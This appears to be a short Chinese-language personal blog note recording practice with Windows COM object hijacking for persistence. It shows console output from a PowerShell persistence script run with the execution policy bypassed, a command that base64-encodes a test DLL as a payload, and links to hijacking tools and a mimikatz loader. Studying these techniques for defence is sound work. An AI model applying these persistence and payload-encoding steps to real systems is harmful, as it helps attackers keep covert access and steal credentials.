com_xml

视频演示：

https://github.com/3gstudent/COM-Object-hijacking

不知不觉这条安全道路走快两年了，这博客记录我的学习记录，加油！

payload 加密

PS C:\Users\demon> powershell -ExecutionPolicy Bypass -File "C:\Users\demon\Desktop\COM Object hijacking persistence.ps1
"
[*] Searching Folder...
[+] Create Folder:  C:\Users\demon\AppData\Roaming\Microsoft\Installer\
[+] Create Folder:  C:\Users\demon\AppData\Roaming\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}
[*] Detecting operating system...
[+] OS: x64
[*] Releasing file...
[+] Done.
[*] Modifying registry...
[*] 64-bit:
[*] 32-bit:
[+] Done.
PS C:\Users\demon>

PS C:\Users\demon> $fileContent = [System.IO.File]::ReadAllBytes('C:\Users\demon\Desktop\calcmutex.dll')
PS C:\Users\demon> $fileContentEncoded = [System.Convert]::ToBase64String($fileContent)| set-content ("123.txt")

http://www.4hou.com/technology/4958.html
https://github.com/3gstudent/test/blob/master/calcmutex.dll

2.xml_mimikatz
https://gist.github.com/caseysmithrc/b1190e023cd29c1910c01a164675a22e